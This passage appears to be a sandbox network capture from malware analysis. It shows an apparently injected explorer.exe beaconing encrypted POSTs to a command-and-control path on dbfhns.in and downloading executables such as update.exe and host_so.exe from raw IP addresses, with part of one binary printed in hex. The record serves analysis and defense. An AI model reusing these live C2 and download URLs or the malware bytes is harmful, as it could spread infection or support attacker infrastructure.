3	192.168.2.5	49714	190.187.52.42	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 10:30:21.399810076 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pvhxcowxrsmsmxv.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 352 Host: dbfhns.in
May 26, 2024 10:30:21.399823904 CEST	352	OUT	Data Raw: 3b 6e 58 10 f0 bf 68 23 d7 ad b7 04 77 09 7a bc 7d 0e b9 93 6b 00 93 6b 00 7b 09 e0 46 ca c6 6f ea 5d ce 20 76 1d 23 1b ed 9c 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 35 28 e0 ea Data Ascii: ;nXh#wz}kk{Fo] v#?#1\|J7 M@NA -[k,vu5(XGSE<>uRHj)D`AJ9BA)ZseZ.,hIH&!BM{jlc?lvT8\YR9D*
May 26, 2024 10:30:22.557220936 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:30:22 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49715	190.187.52.42	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 10:30:22.667558908 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xhkcnscxetvodwbe.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 329 Host: dbfhns.in
May 26, 2024 10:30:22.667579889 CEST	329	OUT	Data Raw: 3b 6e 58 10 f0 bf 68 23 d7 ad b7 04 77 09 7a bc 7d 0e b9 93 6b 00 93 6b 00 7b 09 e0 46 ca c6 6f ea 5d ce 20 76 1d 23 1b ed 9c 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 38 1b fb e5 Data Ascii: ;nXh#wz}kk{Fo] v#?#1\|J7 M@NA -[k,vu8_uU8WM3/s.rUg@Ee*DRjS9bL6>u,5Q(?2,&vQ$Q4u=?2
May 26, 2024 10:30:24.123642921 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:30:23 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49716	190.187.52.42	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 10:30:25.176892042 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wmdyxmgpkfrir.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 259 Host: dbfhns.in
May 26, 2024 10:30:25.176913977 CEST	259	OUT	Data Raw: 3b 6e 58 10 f0 bf 68 23 d7 ad b7 04 77 09 7a bc 7d 0e b9 93 6b 00 93 6b 00 7b 09 e0 46 ca c6 6f ea 5d ce 20 76 1d 23 1b ed 9c 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 5c 18 bf b5 Data Ascii: ;nXh#wz}kk{Fo] v#?#1\|J7 M@NA -[k,vu\dC\vO6c :^`vV_?>PXYUU9O5,WGb1T$ecJ_cM^FAFnggeKPd
May 26, 2024 10:30:26.578068018 CEST	191	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:30:26 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2d 5e 24 17 a6 61 44 a2 ae 09 ab c8 ad ac 2b 98 2b 9a ed 33 5e 14 98 8f c1 cb 7c d1 Data Ascii: #\-^$aD++3^\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49717	45.129.96.86	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 10:30:26.659168959 CEST	165	OUT	GET /file/update.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 45.129.96.86
May 26, 2024 10:30:27.335818052 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Sun, 26 May 2024 08:30:27 GMT Content-Type: application/octet-stream Content-Length: 325120 Last-Modified: Sun, 26 May 2024 08:30:02 GMT Connection: keep-alive ETag: "6652f30a-4f600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 5b 37 b0 84 3a 59 e3 84 3a 59 e3 84 3a 59 e3 89 68 86 e3 98 3a 59 e3 89 68 b9 e3 09 3a 59 e3 89 68 b8 e3 aa 3a 59 e3 8d 42 ca e3 8d 3a 59 e3 84 3a 58 e3 e7 3a 59 e3 31 a4 bc e3 85 3a 59 e3 89 68 82 e3 85 3a 59 e3 31 a4 87 e3 85 3a 59 e3 52 69 63 68 84 3a 59 e3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e 81 f9 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 0c 01 00 00 74 08 00 00 00 00 00 86 3d 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 09 00 00 04 00 00 70 bc 05 00 02 00 00 81 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$[7:Y:Y:Yh:Yh:Yh:YB:Y:X:Y1:Yh:Y1:YRich:YPELct= @pdHx@ d.text3 `.rdatal n@@.dataF~@.rsrcL@@
May 26, 2024 10:30:27.339023113 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 24 c5 48 00 e8 27 02 00 00 68 29 1b 41 00 e8 0f 24 00 00 59 c3 b9 2c c5 48 00 e8 7a 02 00 00 68 1f 1b 41 Data Ascii: $H'h)A$Y,HzhA#YHhA#Yj HjHj(HjHUQQQQ$]EYY]UQQQQ$$]EYY]UE]
May 26, 2024 10:30:27.342849970 CEST	1236	IN	Data Raw: 89 45 e4 8b 4d e8 8b c3 d3 e8 89 45 f8 8b 45 d4 01 45 f8 8b 45 f8 33 45 e4 31 45 fc 8b 45 fc 29 45 ec 8b 4d d0 81 c7 47 86 c8 61 89 7d f0 4e 0f 85 29 ff ff ff 8b 75 cc 8b 45 ec 5f 89 5e 04 89 06 5e 5b 8b e5 5d c3 56 8b 35 08 c5 48 00 c1 ee 03 57 Data Ascii: EMEEEE3E1EE)EMGa}N)uE_^^[]V5HW=HtNu_^UQeEEH]USSV3W=$ AS8q Fr\|HAKQSHHd AMHQj@
May 26, 2024 10:30:27.342888117 CEST	1236	IN	Data Raw: 59 18 81 44 24 20 f4 2a 9d 04 81 44 24 30 ea 66 bb 37 81 44 24 14 40 02 87 21 b8 3d d8 cd 38 f7 64 24 1c 8b 44 24 1c 81 6c 24 0c 1a 75 11 74 b8 31 7a bb 79 f7 64 24 1c 8b 44 24 1c 81 6c 24 30 ff 4d 18 6e 81 44 24 20 6c 8f e2 39 b8 b9 1b f5 11 f7 Data Ascii: YD$ *D$0f7D$@!=8d$D$l$ut1zyd$D$l$0MnD$ l9d$D$l$l$k`l$09D$$^l$?OsRZd$D$<-md$,D$,l$/l$8\|BD$+_D$`0D$$PM'"d$ D$ fpmd$PD$PD$,EAl$<eACj02
May 26, 2024 10:30:27.352406979 CEST	1236	IN	Data Raw: 56 e8 d4 00 00 00 eb 2b 80 7d 0c 00 74 19 83 fe 10 73 14 8b 47 10 8b cf 3b f0 0f 42 c6 50 6a 01 e8 2f fe ff ff eb 0c 85 f6 75 08 56 8b cf e8 87 ff ff ff 33 c0 3b c6 5f 1b c0 f7 d8 5e 5d c2 08 00 8b cf e8 31 00 00 00 cc 55 8b ec 83 7d 08 00 57 8b Data Ascii: V+}tsG;BPj/uV3;_^]1U}WtI9Er=G;Ev2_]hxAhxAU]faayrUQEPN3B;HF]ASVuWe
May 26, 2024 10:30:27.356265068 CEST	1236	IN	Data Raw: f9 80 00 00 00 0f 82 ce 01 00 00 8b c7 33 c6 a9 0f 00 00 00 75 0e 0f ba 25 18 90 41 00 01 0f 82 da 04 00 00 0f ba 25 30 5e 44 00 00 0f 83 a7 01 00 00 f7 c7 03 00 00 00 0f 85 b8 01 00 00 f7 c6 03 00 00 00 0f 85 97 01 00 00 0f ba e7 02 73 0d 8b 06 Data Ascii: 3u%A%0^Dsvs~vftcfoNvfo^0foF fon0v00fof:ffof:fGfof:fo 0}vfoNvIfo^0f
May 26, 2024 10:30:27.356298923 CEST	1236	IN	Data Raw: 47 02 8b 44 24 0c 5e 5f c3 90 8a 46 03 88 47 03 8a 46 02 88 47 02 8a 46 01 88 47 01 8b 44 24 0c 5e 5f c3 8d a4 24 00 00 00 00 57 8b c6 83 e0 0f 85 c0 0f 85 d2 00 00 00 8b d1 83 e1 7f c1 ea 07 74 65 8d a4 24 00 00 00 00 90 66 0f 6f 06 66 0f 6f 4e Data Ascii: GD$^_FGFGFGD$^_$Wte$fofoNfoV fo^0ffOfW f_0fof@fonPfov`fo~pfg@foPfw`fpJutOtfofvJut*tvIutFGIu
May 26, 2024 10:30:27.363976002 CEST	1236	IN	Data Raw: 8f f0 8b 44 8e f4 89 44 8f f4 8b 44 8e f8 89 44 8f f8 8b 44 8e fc 89 44 8f fc 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 f8 2c 40 00 8b ff 08 2d 40 00 10 2d 40 00 1c 2d 40 00 30 2d 40 00 8b 44 24 0c 5e 5f c3 90 8a 06 88 07 8b 44 24 0c 5e 5f c3 90 Data Ascii: DDDDDD$,@-@-@-@0-@D$^_D$^_FGD$^_IFGFGD$^_t1\|9u$r$.@$D.@Ir+$-@$.@-@-@-@F#Gr
May 26, 2024 10:30:27.363991022 CEST	1224	IN	Data Raw: 00 00 8b 01 ba ff fe fe 7e 03 d0 83 f0 ff 33 c2 83 c1 04 a9 00 01 01 81 74 e8 8b 41 fc 84 c0 74 32 84 e4 74 24 a9 00 00 ff 00 74 13 a9 00 00 00 ff 74 02 eb cd 8d 41 ff 8b 4c 24 04 2b c1 c3 8d 41 fe 8b 4c 24 04 2b c1 c3 8d 41 fd 8b 4c 24 04 2b c1 Data Ascii: ~3tAt2t$ttAL$+AL$+AL$+AL$+W\|$n$L$Wtt=u~3tAt#tttyyyyL$ttf
May 26, 2024 10:30:27.371763945 CEST	1236	IN	Data Raw: 05 60 30 41 00 f2 0f 5c c8 66 0f d6 4c 24 04 dd 44 24 04 c3 d9 ee c3 66 0f c2 1d 90 30 41 00 01 66 0f 56 1d 90 30 41 00 66 0f 54 1d 80 30 41 00 66 0f d6 5c 24 04 dd 44 24 04 c3 55 8b ec 56 8b 75 08 8b 46 0c a8 83 75 10 e8 85 12 00 00 c7 00 16 00 Data Ascii: `0A\fL$D$f0AfV0AfT0Af\$D$UVuFunS]FWuV-}3Y}V2FYyFttuFSWV%-YP03_[A^]jh~Ae3uu
May 26, 2024 10:30:27.371778011 CEST	1236	IN	Data Raw: e4 8b d9 89 5d d4 89 45 e0 8b f8 eb 9c 68 c0 21 41 00 68 b0 21 41 00 e8 bb fe ff ff 59 59 68 c8 21 41 00 68 c4 21 41 00 e8 aa fe ff ff 59 59 c7 45 fc fe ff ff ff e8 20 00 00 00 83 7d 10 00 75 29 c7 05 ec 5d 44 00 01 00 00 00 6a 08 e8 3b 32 00 00 Data Ascii: ]Eh!Ah!AYYh!Ah!AYYE }u)]Dj;2Yu\}tj%2Y\|Ujju]Uu:Ytu%AYt]jEE/APMh}AEE/APjhA:2jKYM

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49718	190.187.52.42	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 10:30:27.910020113 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qsvttmlmwckhyv.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 323 Host: dbfhns.in
May 26, 2024 10:30:27.910036087 CEST	323	OUT	Data Raw: 3b 6e 58 10 f0 bf 68 23 d7 ad b7 04 77 09 7a bc 7d 0e b9 93 6b 00 93 6b 00 7b 09 e0 46 ca c6 6f ea 5d ce 20 76 1d 23 1b ed 9c 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2c 5b 0e 6b 2c 90 f4 76 0b 75 50 51 b3 e2 Data Ascii: ;nXh#wz}kk{Fo] v#?#1\|J7 M@NA ,[k,vuPQ&wd'a"Zg&I1elFGLF/v_*"MaEE?k C]2gTGVD:#;#KlT8R,x\|;']Gb
May 26, 2024 10:30:29.111198902 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:30:28 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49720	190.187.52.42	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 10:30:29.219755888 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fmxjggdvslwul.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 196 Host: dbfhns.in
May 26, 2024 10:30:29.219770908 CEST	196	OUT	Data Raw: 3b 6e 58 10 f0 bf 68 23 d7 ad b7 04 77 09 7a bc 7d 0e b9 93 6b 00 93 6b 00 7b 09 e0 46 ca c6 6f ea 5d ce 20 76 1d 23 1b ed 9c 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 77 01 af ad Data Ascii: ;nXh#wz}kk{Fo] v#?#1\|J7 M@NA -[k,vuwg&cUuGnMam0S6h9Y(5Bxi'\n lJTyMD
May 26, 2024 10:30:30.382286072 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:30:30 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49722	190.187.52.42	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 10:30:30.459445000 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dsnbbvyutqhm.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 239 Host: dbfhns.in
May 26, 2024 10:30:30.459465027 CEST	239	OUT	Data Raw: 3b 6e 58 10 f0 bf 68 23 d7 ad b7 04 77 09 7a bc 7d 0e b9 93 6b 00 93 6b 00 7b 09 e0 46 ca c6 6f ea 5d ce 20 76 1d 23 1b ed 9c 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 7d 24 ce a7 Data Ascii: ;nXh#wz}kk{Fo] v#?#1\|J7 M@NA -[k,vu}$yelW~KxvHrYhRQ/.GT"K9A!_6EZ4=>X-S0BHAse`8O
May 26, 2024 10:30:31.603837013 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:30:31 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49723	190.187.52.42	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 10:30:31.722779036 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://alfdwfnhtcwp.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 200 Host: dbfhns.in
May 26, 2024 10:30:31.722824097 CEST	200	OUT	Data Raw: 3b 6e 58 10 f0 bf 68 23 d7 ad b7 04 77 09 7a bc 7d 0e b9 93 6b 00 93 6b 00 7b 09 e0 46 ca c6 6f ea 5d ce 20 76 1d 23 1b ed 9c 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 20 2b b3 bd Data Ascii: ;nXh#wz}kk{Fo] v#?#1\|J7 M@NA -[k,vu +qcMU(I;LlS[kv[2'>r!/1Tz"LO:C^S,E8
May 26, 2024 10:30:32.875505924 CEST	190	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:30:32 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2b 58 24 17 a0 6d 44 af a8 09 a2 cc b6 e5 32 9d 20 c1 e0 2a 0b 19 9a c4 8a d6 61 Data Ascii: #\+X$mD2 *a

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49725	23.145.40.124	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 10:30:32.908678055 CEST	164	OUT	GET /pintxi1lv.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 23.145.40.124

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49729	185.235.137.54	80	6204	C:\Users\user\AppData\Local\Temp\A247.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 10:30:39.725806952 CEST	205	OUT	GET /file/host_so.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.235.137.54

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49731	190.187.52.42	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
